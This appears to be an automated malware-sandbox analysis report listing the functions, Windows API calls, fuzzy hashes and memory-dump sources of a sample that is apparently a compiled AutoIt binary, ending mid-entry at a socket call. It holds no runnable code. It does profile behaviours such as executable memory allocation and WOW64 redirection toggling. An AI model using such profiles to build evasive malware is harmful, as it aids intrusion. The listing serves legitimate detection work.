                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorHandling__87except__start
                              • String ID: pow
                              • API String ID: 2905807303-2276729525
                              • Opcode ID: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                              • Instruction ID: 541879a80a9d71487af26c6bee33b02815af430b16128580083d08e04d8d61b9
                              • Opcode Fuzzy Hash: 2d8d8ba9f9cbd4a32296abc2af460f7e89d0c21bf531580e5252c8ff54bc4efb
                              • Instruction Fuzzy Hash: 57517B21A1DA0686EB106718C9513FF6BD0FB42754F208968E4D5C1BE9EF748CD4EE8A
                              Function 008A023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$+
                              • API String ID: 0-2552117581
                              • Opcode ID: ed8068881ab7960d8236f041549ff48d88082b54f3c4c2ff2122a0927ca270e0
                              • Instruction ID: e177b24426fed319861020d9ebe2817b895ba4bd35e830b76dbf98b90a4d8509
                              • Opcode Fuzzy Hash: ed8068881ab7960d8236f041549ff48d88082b54f3c4c2ff2122a0927ca270e0
                              • Instruction Fuzzy Hash: 3151EE7550524A9FDF25AF28C4886FA7BA6FF1A310F144167E891DB3A0D7309D42CB71
                              Function 008962F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$_memmove
                              • String ID: ERCP
                              • API String ID: 2532777613-1384759551
                              • Opcode ID: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                              • Instruction ID: 464392f45572afbfa8a0129d152eb3749e6935c2edea7a04e67ba21332db2e73
                              • Opcode Fuzzy Hash: 0562f97a431d04ca792027b6a8745ecbad9a96628287acc8a2594f209483f29b
                              • Instruction Fuzzy Hash: 4B51CE719007099BDF24DFA4C8857AABBF4FF04314F24856EEA4ACA240F7709A90CB44
                              Function 00907BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0090F910,00000000,?,?,?,?), ref: 00907C4E
                              • GetWindowLongW.USER32 ref: 00907C6B
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00907C7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Long
                              • String ID: SysTreeView32
                              • API String ID: 847901565-1698111956
                              • Opcode ID: 653ee64c902fc26e6361611bf20c7d0f1b51222a219f97c9de42e46be05596ec
                              • Instruction ID: cbed356bc9210932ee81d19b69da87c704f6c3cb8b3b0cc1014b349e5593ae6d
                              • Opcode Fuzzy Hash: 653ee64c902fc26e6361611bf20c7d0f1b51222a219f97c9de42e46be05596ec
                              • Instruction Fuzzy Hash: B831AE31604205AEEB219F78CC45BEAB7ADFB45334F244725F8B5D22E0D731E8519B60
                              Function 00907648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009076D0
                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009076E4
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00907708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window
                              • String ID: SysMonthCal32
                              • API String ID: 2326795674-1439706946
                              • Opcode ID: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                              • Instruction ID: a9bd2436b8e10adca23d1250864e3622183c34a14664a78fcc2dc9318d6c49e5
                              • Opcode Fuzzy Hash: 63ed70fb6cf2434b1bae2866b1d00f1f21c553470252108117efad1f8c15dee4
                              • Instruction Fuzzy Hash: 74219132514219BFDF11CF94CC46FEA3B69EB88764F110214FE15AB1D0DAB6B8519BA0
                              Function 00906F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00906FAA
                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00906FBA
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00906FDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$MoveWindow
                              • String ID: Listbox
                              • API String ID: 3315199576-2633736733
                              • Opcode ID: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                              • Instruction ID: 77ae787e3f90a7f71c48f7d697350cc1a7acdeb29283822a81fc5a790cc2804f
                              • Opcode Fuzzy Hash: baff54d427c5b591b8eb4c4ac036887f26f2d8c7832f7d95f60edef133c55ece
                              • Instruction Fuzzy Hash: 7321C532610119BFDF118F54DC85FAB37AEEF89754F018124FA04971D0C771AC619BA0
                              Function 0090797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009079E1
                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009079F6
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00907A03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              • Opcode ID: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                              • Instruction ID: 8036228c5dadc38eee09df911dc42f1f2aae6280c1e90ddb2ecc76c252c18bf1
                              • Opcode Fuzzy Hash: 1b0dfbef700654ad897dbad7b8297630b09f599543c26db9376f63879d80eaa8
                              • Instruction Fuzzy Hash: 9A11E372654208BEEF209FA4CC05FAB77ADEFC9B68F014519FA51A60D0D672A811DB60
                              Function 00884C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884C2E), ref: 00884CA3
                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884CB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetNativeSystemInfo$kernel32.dll
                              • API String ID: 2574300362-192647395
                              • Opcode ID: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                              • Instruction ID: 1afa8cd2587d2c3f2ed1d88045f489735cff6a5ef10bf6a551da26946f241eee
                              • Opcode Fuzzy Hash: e89b669481be792049e97881254111a695673f217c9dcef954420107387a528e
                              • Instruction Fuzzy Hash: 18D01732528723CFD730AF31DA2860676EAFF05795B11883A988AD6990E674DA80CB50
                              Function 00884D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884CE1,?), ref: 00884DA2
                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00884DB4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                              • API String ID: 2574300362-1355242751
                              • Opcode ID: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                              • Instruction ID: 1005021e964be8cb80774446a85b0e70bdd69e83d80bbdf199ccdf362141a98e
                              • Opcode Fuzzy Hash: 752df5ded570fb244c91fbe26cf4c1285f58b057ea3d0e1147628a132fd70a67
                              • Instruction Fuzzy Hash: 2AD01772568713CFD730AF71D818A46B6E8FF09359B11883AD8C6D6990E770D880CB50
                              Function 00884D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00884D2E,?,00884F4F,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884D6F
                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00884D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                              • API String ID: 2574300362-3689287502
                              • Opcode ID: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                              • Instruction ID: bf7a2d6df4fc0381dcadaf0fcd887f7b148ce6ad837ad736175a4018859c1820
                              • Opcode Fuzzy Hash: e81ba11c53449fa43add13dcf7ca33d6eb627839964c72c1a9b2494a5e783b73
                              • Instruction Fuzzy Hash: 7AD01771528713CFD730AF71D818616B6E8FF15356B118C3A9886D6A90E670D880CF50
                              Function 00901072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll,?,009012C1), ref: 00901080
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00901092
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              • Opcode ID: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                              • Instruction ID: fb6fbe532f5320a6b196336e0d403044786a02d1f776f71ee8defa77b66a4970
                              • Opcode Fuzzy Hash: 6fe8507de8a6102cc4550fcde5168878bddb5c495fd94ca63005a6bad0d41c9f
                              • Instruction Fuzzy Hash: BDD01730528712CFD7309F35E828A1B76F8AF59365F118D3AE8DADA590E770C8C0CA50
                              Function 008F93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,008F9009,?,0090F910), ref: 008F9403
                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 008F9415
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetModuleHandleExW$kernel32.dll
                              • API String ID: 2574300362-199464113
                              • Opcode ID: 6534effe13b28be3f6888e902a067dfdd61d7f5e85bce382fa979b5f3ac0e703
                              • Instruction ID: 2a5b8d92d4f1ac3570e7a69f261ffac2857fb5f978c7baa1c960398b3ea448ed
                              • Opcode Fuzzy Hash: 6534effe13b28be3f6888e902a067dfdd61d7f5e85bce382fa979b5f3ac0e703
                              • Instruction Fuzzy Hash: A1D0173452871BCFD7319F31D91861676E9FF25355B11C83AE5C6D6990E670C8C0DA50
                              Function 008D76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                              • Instruction ID: a46c85acda1867a3bc7370deea4927ce2de2a08932973f7a9d77242d4393c6d9
                              • Opcode Fuzzy Hash: 62b97e2174a0d0e7c404b9b94987d6ca69b5ecfdc7e534658c7da1b6568dd7e3
                              • Instruction Fuzzy Hash: DDC16075A0421AEFCB14CF94C894EAEBBB5FF48714B11869AE805EB351E730DD41DB90
                              Function 008FE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                              Download Yara Rule
                              APIs
                              • CharLowerBuffW.USER32(?,?), ref: 008FE3D2
                              • CharLowerBuffW.USER32(?,?), ref: 008FE415
                                • Part of subcall function 008FDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 008FDAD9
                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 008FE615
                              • _memmove.LIBCMT ref: 008FE628
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharLower$AllocVirtual_memmove
                              • String ID:
                              • API String ID: 3659485706-0
                              • Opcode ID: 6ca99bb0f7239905f735d2121a52d6921833f202c24afccea07e238c9a1094b5
                              • Instruction ID: 23b62cec22e9753ca3ab79b8084e0b535ed1e2d49db1ec1fe3b62f0d8ccc635c
                              • Opcode Fuzzy Hash: 6ca99bb0f7239905f735d2121a52d6921833f202c24afccea07e238c9a1094b5
                              • Instruction Fuzzy Hash: 66C146716083158FC714DF28C48096ABBE4FF89718F14896EF999DB361D731EA46CB82
                              Function 008F83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 008F83D8
                              • CoUninitialize.OLE32 ref: 008F83E3
                                • Part of subcall function 008DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 008DDAC5
                              • VariantInit.OLEAUT32(?), ref: 008F83EE
                              • VariantClear.OLEAUT32(?), ref: 008F86BF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                              • String ID:
                              • API String ID: 780911581-0
                              • Opcode ID: fe394c88a4e472d0d37d370c4b5d2a267a00194b83b8b2554f838be46daa7a51
                              • Instruction ID: 22175188e4627ea9bde207f042b5ede9bf29a4851978784564c140731f39afe8
                              • Opcode Fuzzy Hash: fe394c88a4e472d0d37d370c4b5d2a267a00194b83b8b2554f838be46daa7a51
                              • Instruction Fuzzy Hash: B9A103752047159FDB10EF28C885A2ABBE5FF88314F184459FA9ADB3A1CB34ED05CB46
                              Function 008D7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                              Download Yara Rule
                              APIs
                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C32
                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C4A
                              • CLSIDFromProgID.OLE32(?,?,00000000,0090FB80,000000FF,?,00000000,00000800,00000000,?,00912C7C,?), ref: 008D7C6F
                              • _memcmp.LIBCMT ref: 008D7C90
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FromProg$FreeTask_memcmp
                              • String ID:
                              • API String ID: 314563124-0
                              • Opcode ID: 1409acb039a77717956ddba147de263cb55fd64b54095dfa2a42b494b7890531
                              • Instruction ID: e06102b92fac64bb68071d7b4a5a6cdb8e17984a76fa73635c01e4a3da944941
                              • Opcode Fuzzy Hash: 1409acb039a77717956ddba147de263cb55fd64b54095dfa2a42b494b7890531
                              • Instruction Fuzzy Hash: AA810875A00109EFCB04DF94C984EEEB7B9FF89315F204199E506EB250EB71AE06CB61
                              Function 008D6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • String ID:
                              • API String ID: 2808897238-0
                              • Opcode ID: d4e83fb8d97d35deda2c9eeebe1dbb0a3683ba69dc876e6fca9b5f0493baca7c
                              • Instruction ID: 5431b1f5103a9478baa7fdc49abce77039ffc50a8f5368f956230787dbc5dc31
                              • Opcode Fuzzy Hash: d4e83fb8d97d35deda2c9eeebe1dbb0a3683ba69dc876e6fca9b5f0493baca7c
                              • Instruction Fuzzy Hash: F651B230608705DEDB24AF69D895A2AB3E5FF48310F24891FE996CB7D1FE709C409B52
                              Function 00909A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(0116DF68,?), ref: 00909AD2
                              • ScreenToClient.USER32(00000002,00000002), ref: 00909B05
                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00909B72
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: bf76700afb16964d636978db37e59435cc3e38614d74bb007fc09e52b1bfcd12
                              • Instruction ID: 2cbb63f2247a06f8e7e8cbea9b4efd81c7aba771b96048a02b75a3924381d383
                              • Opcode Fuzzy Hash: bf76700afb16964d636978db37e59435cc3e38614d74bb007fc09e52b1bfcd12
                              • Instruction Fuzzy Hash: 10513E75A04209EFDF20DF68D880AAE7BB9FF45324F108259F8159B2D1D730AD81DB90
                              Function 008F6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                              Download Yara Rule
                              APIs
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 008F6CE4
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F6CF4
